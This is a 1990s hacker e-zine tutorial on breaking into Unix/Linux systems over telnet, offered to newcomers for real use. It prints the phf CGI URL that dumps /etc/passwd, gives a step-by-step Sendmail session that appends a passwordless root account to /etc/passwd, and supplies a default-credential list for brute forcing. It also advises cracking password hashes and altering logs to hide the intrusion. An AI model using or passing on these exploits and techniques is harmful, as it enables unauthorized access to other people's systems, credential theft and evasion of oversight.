

                        ***Hacking Unix/Linux systems***
                                   Via Telnet
                                By: Techno Phunk

O.k, there has been enough virus writing things in our e-zine and
I finaly descided to jump in and talk a little about hacking
for your first lesson I am going to teach you a LITTLE about
hacking linux/unix system's via telnet, later I will teach more
about telenet (Sprintnet) and direct dialup's, and eventialy
I will teach you how to hack VAX/VMS, but not until you master
Unix/linux should you even ATTEMPT a VAX, belive me, it's for the elite's
only as it is NOT as bugy as linux/unix. anyway a little history on unix.

 History
--=====--
 The unix OS originated from AT&T in the early 1970's Because UNIX was able
 to run on diffrent hardware from diffrent vendors, this made developers
 to modify the OS and distribute their own versions. USL's (new makers) system
 V, Berkeley Standar Distibution (DSD, From the university of California,
 Berkley), Xenix, etc are just a few examples. Now on with the show...

 The unix system/linux system has been known to have Multiple
exploits that can be used agianst them, one of which is the famous
phf bug: http://www.domain.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
this bug of course is almost totaly outdated, exception of alot of the
less known .edu sites, and .gov/.net sites. Of course many other
bugs are also unique to this system such as the Sendmail bug's such
as the one where the software could send mail DIRECTLY to a file
so someone could write a extra acount to the passwd file, and gain
root acces. I personaly have a multitude of exploits that I have
put into my memory and I could use anywhere without refering to any
files. from here on, I will be telling alot more about hacking of
unix systems (and linux, there basicly the same people) from a telnet
platform, what to do, etc....

First of all, before hacking a system, examin it, and get all the
info you can get on it, finger them(port 79), Ping them, do whatever
you can  to get all the info possible, think about who the sysop is, etc
just don't do any destruction as this is *LAME*, it makes you a CYBERPUNK
not a hacker, and last but not least it makes people WANT to catch you
and to spend money looking for you, also the FBI/Secret Service won't
take the case unless 1000$ of damages are done.

Now then
------
You need a good telnet program, such as the one that comes with
Win95 or my personal favorite: EWAN, anyway, any telnet software
should be fine. You will also need a ppp/slip/Winsock
connection. If you are on AOL, don't dispare it will work as long
as you use V.3.0 of AOL or above.

Now that you have found a good telnet program we can go on...
now somehow you must get a password to this system preferably
to the Sysadmin acount or Root (unfortunatly, the root account can
only be remotly accessed on Redhat linux, and some of the BSD's)
or any of the shell's (if you wish) anyway, there are several
ways to do this. first would be social engeniring, if that is possible
social engenering is quiet simple, all you must do, is trick a person
into giving you information. A leson on Social Engineering will be
covered in the next file (if I get around to it, in this issue)
 Next you can pull an exploit such as the phf bug (if it hasn't allready been
taken off) and if you do
pull the phf bug, if the file looks like this:

root:*:0:1:system PRIVILEGED account,,,:/:/usr/bin/sh
daemon:*:1:1:system background account:/:
       ^ notice the star
then forget it, since this file is shaddowed, you will need to try
something else

but if it looks sorta like this:
root:WAdadtiA:0:1:system PRIVILEGED account,,,:/:/usr/bin/sh
daemon:dCDa2Hn:1:1:system background account:/:

(file will look SOMETHING like this) then you are home free to d/l
this and then run a pw cracker on it, yet this is not hacking yet...
in order for any type of bust in (into a computer) to become a hack
you must learn about the system, how it works and the like, since
hacking is simply a way of gathering information.

now if the phf bug or one of the many exploits works, and you get the
UNshadowed PW file, then all you must do is, crack it, write down
or save all the logins and passwords that where found(some do this for you)
I personaly use cracker jack with multiple word lists and now move on to
the next stage which will be picked up on after I tell what to do if this
doesn't work.

If no exploits work then your going to have to go with the next
part...Brute forcing and defaults
I will be nice and include one of my personal (ONE of them) lists
that I use for brute forcing. Brute forcing is covered in the latest
issue of 2600 magazine (Volume #14, 3, Autum 1997), but I will explain
this anchient art here too. Brute Forceing is basicly the act of
hamering out passwords at a specific acount name (such as in this
example: sysadmin) until you get in, this is the last resort to
get into a system that seems to have NOOO exploits or wide open
back doors. Brute forcing can be tiediosly done by hand or
simply by a script. The problem with Bruting Unix systems is that
after 3 login attempts (in most casses) will simply log you off, so
you would simply have to see how many chances you have and then
program the script accordingly. Keep in mind that all your activities
are probably going to be loged, so once you get in, modify those logs
to cover up your tracks, or use a program (avialable almost ANYWHERE).
Anyway....here is a list of default passwords and login's to try first
before you attempt a brute force. In most cases this list may work, or
then agian it may not, it just depends on the system admin IQ :).

------------------------------------------------------------------
Login:                          Password:

root                                    root
root                                    system
sys                                     sys
sys                                     system
daemon                                  daemon
uucp                                    uucp
tty                                     tty
test                                    test
unix                                    unix
unix                                    test
bin                                     bin
adm                                     adm
adm                                     admin
admin                                   adm
admin                                   admin
sysman                                  sysman
sysman                                  sys
sysman                                  system
sysadmin                                sysadmin
sysadmin                                sys
sysadmin                                system
sysadmin                                admin
sysadmin                                adm
who                                     who
learn                                   learn
uuhost                                  uuhost
guest                                   guest
host                                    host
nuucp                                   nuucp
rje                                     rje
games                                   games
games                                   player
sysop                                   sysop
root                                    sysop
demo                                    demo
SYSTEM                                  OPERATOR
SYSTEM                                  MANAGER
SYSTEM                                  SYSTEM
SYSTEM                                  SYSLIB
OPERATOR                                OPERATOR
SYSTEST                                 UETP
SYSTEST                                 SYSTEST
SYSTEST                                 TEST
SYSMAINT                                SYSMAINT
SYSMAINT                                SERVICE
SYSMAINT                                DIGITAL
FIELD                                   FIELD
FIELD                                   SERVICE
GUEST                                   GUEST
GUEST                                   unpassworded
DEMO                                    DEMO
DEMO                                    unpassworded
TEST                                    TEST

Note: unpassworded means to just hit enter when it prompts for a PW
-------------------------------------------------------------------

Now then, I will now cover some basic exploits, etc and the brute fource
list will be attached to the bottom of this file.

Exploits.
==========

Most exploits covered here are probably not going to work on like the
CIA, or something like that, but thease are clasic and common exploits.
If you want to see more "up to date" exploits I recomend rootshell.com
which has a NICE collection which are useful for some situations.
The following bugs will need you to have at least an IQ of 2 and
telnet/ftp/http/etc programs.

First of all I'd like to cover some of the "sendmail exploits"
One of the most famous, but usualy uncommon to work (on up-to-date systems)
in otherwords if the system your hacking is up-to-date and older, and
is updated CONSTANTLY, then chances 10-1 it won't work, but you never
know so TRY IT! never hurts to T-R-Y. When people say "teach me to hack"
I say "Trial-and-error" and that is all, what else do I need to say?
well basicly this exploit takes advantage of Sendmail's ability to
send mail DIRECTLY to files on the host system, e.g TO: /etc/passwd
anyway, what you do is basicly send mail to the passwd file and
then you login with the "unpassworded" root access'ed acount that
you create. Now since I know this is a "newbie" file I will now explain
a bit about sendmail, how to use it, what it is, it's past, future, and
it's role in the Unix/Linux/Bsd enviroment.

Sendmail which is a oviosly a SMTP program, SMTP stands for Simple Mail
Transfer Protocule if I am correct (I hit my head many times on walls and
things) anyway, basicly it allows a user to sendmail to any internet
or local user. The Sendmail program like the finger program run on a
certain port, like finger runs on port 79, and is USUALY open for remote
acces, but sendmail (port 25) is ALWAYS open, unless the user doesn't use
sendmail which that is still EXTREEMLY unusual, and only people that I know
that don't run it are fellow hackers. Anyway so in order to access it you
must *TELNET* (remember that program I told you to get) to port 25 of your
target machine, now in order to get the target machines TCP or IP you must
do a whois (or a DNS lookup) now, you may get a dns lookup/whois program
for winblows all you need is a valid internet connection, but I use either
a. a shell acount or b. internic (http://www.internic.com) c. /dns on
mIRC in other words /dns yahoo.com then it will say: Resolved yahoo.com to
then a number which is the IP, now you have the IP/TCP of you target you
must telnet to that 'host'. Now if your smart or like me, you WILL be sure
you know all the information possible about your "target". Back onto
sendmail, now when you first connect it SHOULD say SOMETHING like this:
Sendmail 8.3.2 (host) ready to go....anyway, something like that

Once you see this, hit enter (it should report something like unknown command)
this is needed since we are using a telnet program, not a SMTP program.
anyway from here you can explore the commands, type HELP, otherwise hang
with me for a few now from here to pull the exploit you do the following.

Mail FROM: root@whatever.com (this could be whatever you want)
RCPT TO: /etc/passwd

now if it says "can not send mail directly to files" then forget this exploit
then type:

data

then it should say something like:

Type your message and type a period (".") on a blank line when done
then you type:
Wizard::0:0:Super User:/:/bin/csh
.

now it should say mail excepted for delivery
now then you can change Wizard to whatever, but for a beginer, just leave
it. Now since this worked, you may now go threw "normal" telnet (port 23)
and Login would be: Wizard and then password, just hit enter, now wasn't
that easy?

Now, one more program you may want to get is called a port scanner
this will find all open ports for you and tell you what they are
now for those with trouble finding one here is a list of "cool" ports
to try out (BTW- this is from my personal collection, I don't remember
however where I got this):

note: some of thease will work on some systems, other won't (chance)
-----------------------------
        tcpmux          1/tcp                         # rfc-1078
        echo            7/tcp
        echo            7/udp
        discard         9/tcp           sink null
        discard         9/udp           sink null
        systat          11/tcp          users
        daytime         13/tcp
        daytime         13/udp
        netstat         15/tcp
        qotd            17/tcp          quote
        chargen         19/tcp          ttytst source
        chargen         19/udp          ttytst source
        ftp-data        20/tcp
        ftp             21/tcp
        telnet          23/tcp
        smtp            25/tcp          mail
        time            37/tcp          timserver
        time            37/udp          timserver
        rlp             39/udp          resource      # resource location
        name            42/udp          nameserver
        whois           43/tcp          nicname       # usually to sri-nic
        domain          53/tcp
        domain          53/udp
        mtp             57/tcp                        # deprecated
        bootps          67/udp                        # bootp server
        bootpc          68/udp                        # bootp client
        tftp            69/udp
        gopher          70/tcp                        # gopher server
        rje             77/tcp
        finger          79/tcp
        http            80/tcp
        www             80/tcp
        link            87/tcp          ttylink
        kerberos        88/udp          kdc
        kerberos        88/tcp          kdc
        supdup          95/tcp                        # BSD supdupd(8)
        hostnames       101/tcp         hostname      # usually to sri-nic
        iso-tsap        102/tcp
        x400            103/tcp                       # ISO Mail
        x400-snd        104/tcp
        csnet-ns        105/tcp
        pop-2           109/tcp                       # PostOffice V.2
        pop-3           110/tcp                       # PostOffice V.3
        pop             110/tcp                       # PostOffice V.3
        sunrpc          111/tcp
        sunrpc          111/tcp         portmapper    # RPC 4.0 portmapper UDP
        sunrpc          111/udp
        sunrpc          111/udp         portmapper    # RPC 4.0 portmapper TCP
        auth            113/tcp         ident         # User Verification
        sftp            115/tcp
        uucp-path       117/tcp
        nntp            119/tcp         usenet        # Network News Transfer
        ntp             123/tcp                       # Network Time Protocol
        ntp             123/udp                       # Network Time Protocol
        netbios-ns      137/tcp         nbns
        netbios-ns      137/udp         nbns
        netbios-dgm     138/tcp         nbdgm
        netbios-dgm     138/udp         nbdgm
        netbios-ssn     139/tcp         nbssn
        imap            143/tcp                       # imap ntwrk mail prtcl
        NeWS            144/tcp         news          # Window System
        snmp            161/udp
        snmp-trap       162/udp
        exec            512/tcp                       # BSD rexecd(8)
        biff            512/udp         comsat
        login           513/tcp                       # BSD rlogind(8)
        who             513/udp         whod          # BSD rwhod(8)
        shell           514/tcp         cmd           # BSD rshd(8)
        syslog          514/udp                       # BSD syslogd(8)
        printer         515/tcp         spooler       # BSD lpd(8)
        talk            517/udp                       # BSD talkd(8)
        ntalk           518/udp                       # SunOS talkd(8)
        efs             520/tcp                       # for LucasFilm
        route           520/udp         router routed # 521/udp too
        timed           525/udp         timeserver
        tempo           526/tcp         newdate
        courier         530/tcp         rpc           # experimental
        conference      531/tcp         chat
        netnews         532/tcp         readnews
        netwall         533/udp                       # emergency broadcasts
        uucp            540/tcp         uucpd         # BSD uucpd(8) UUCP serv
        klogin          543/tcp                       # Kerberos authen rlogin
        kshell          544/tcp         cmd           # and remote shell
        new-rwho        550/udp         new-who       # experimental
        remotefs        556/tcp         rfs_server rfs# Brunhoff rem filesys
        rmonitor        560/udp         rmonitord     # experimental
        monitor         561/udp                       # experimental
        pcserver        600/tcp                       # ECD Integrated PCb svr
        mount           635/udp                       # NFS Mount Service
        pcnfs           640/udp                       # PC-NFS DOS Authen
        bwnfs           650/udp                       # BW-NFS DOS Authen
        kerberos-adm    749/tcp                       # Kerberos 5adm/changepw
        kerberos-adm    749/udp                       # Kerberos 5adm/changepw
        kerberos-sec    750/udp                       # Kerberos authen--udp
        kerberos-sec    750/tcp                       # Kerberos authen--tcp
        kerberos_master 751/udp                       # Kerberos authen
        kerberos_master 751/tcp                       # Kerberos authen
        krb5_prop       754/tcp                       # Kerberos slave propaga
        listen          1025/tcp        listener RFS remote_file_sharing
        nterm           1026/tcp        remote_login network_terminal
        kpop            1109/tcp                      # Pop with Kerberos
        ingreslock      1524/tcp
        tnet            1600/tcp                      # transputer net daemon
        mud(2000)      2000/tcp                       ## Diku2 MultiUser Dimen
        cfinger         2003/tcp                      # GNU finger
        nfs             2049/udp                      # NFS File Service
        eklogin         2105/tcp                      # Kerberos encrypT rlogi
        mud(4000)       4000/tcp                      ## Diku2 MultiUser Dimen
        mud(4240)       4240/tcp                      ## Diku2 MultiUser Dimen
        mud(4242)       4242/tcp                      ## Diku2 MultiUser Dimen
        krb524          4444/tcp                      # Kerberos 5 to 4 ticket
        irc(6666)       6666/tcp                      ## Alternate IRC port
        irc             6667/tcp                      # Internet Relay Chat
        irc(6668)       6668/tcp                      ## Alternate IRC port
        dos             7000/tcp        msdos
-------------------------------------------------------------------

anyway, now, I won't list many more exploits now as there are millions of them
on the net, expspcialy around http://www.rootshell.com

now, I will go into what you do once you are in....

commands that are usefull to you at this time are going to be things like:

ls                  * list files
cd                  * change DIR note: cd .. goes back, cd / is used instead
                    * of the MS-DOS equivilant: cd\
who                 * who's online
finger              * get info on a user
pico                * one of the text editors
cat                 * display file (like type in Ms-dos)
cc                  * compiler for C programs (exploits ;)

that should get you started, note that this should work in C shell and in
korn shells...

Now, lastly, I hope that you have learned something from all this...
more info can be found at: http://www.angelfire.com/nc/TechnoPhunk/index.html
under the hacking page. I am trying to get more stuff on it, but there is
some other tutorials and other info there. so be sure to stop by

Now, for a word on ethics....
1. though shalt not change anything except for the logs (to cover yourself)
2. though shalt not do destruction
3. don't tell your friends/family/etc that you are a hacker
4. never tell your real name to other hackers
5. never leave behind your handle or name on a hacked server
6. be kind

that's about all for this lesson....I relise it was short, and not VERY
informative, but it should give you a start. I hope to cover more on
Unix hacking next time, possibly a bit more on the BSD's and Linux.
Send me sugestions....TechnoPhunk@thepentagon.com

- Techno Phunk

